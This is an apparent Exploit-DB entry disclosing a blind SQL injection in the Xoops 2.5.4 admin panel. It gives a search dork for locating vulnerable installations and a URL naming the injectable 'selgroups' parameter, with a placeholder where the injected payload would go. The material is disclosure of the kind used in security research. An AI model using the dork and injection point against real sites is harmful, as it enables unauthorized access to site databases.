[] NeoSense

Xoops 2.5.4 - Blind SQL Injection

Author: blkhtc0rp
type: webapps
platform: php
port: 
date_added: 2011-12-11 
date_updated: 2011-12-11 
verified: 0 
codes: OSVDB-83158 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comxoops-2.5.4.rar

------------------------------------------
# Xoops 2.5.4 Blind SQL Injection
------------------------------------------

# Dork: "Powered by XOOPS 2.5.4"
# Download: http://sourceforge.net/projects/xoops/
# Date: 10/12/2011
# Author: blkhtc0rp
# Mail: blkhtc0rp[at]yahoo[dot]com
# Tested on: Freebsd 8 and Debian Squeeze


Note:

In order to be successful an attacker must have permission to access the administration menu.

Exploit:

http://192.168.1.109/xoops-2.5.4/modules/system/admin.php?fct=users&selgroups=[Blind Sqli]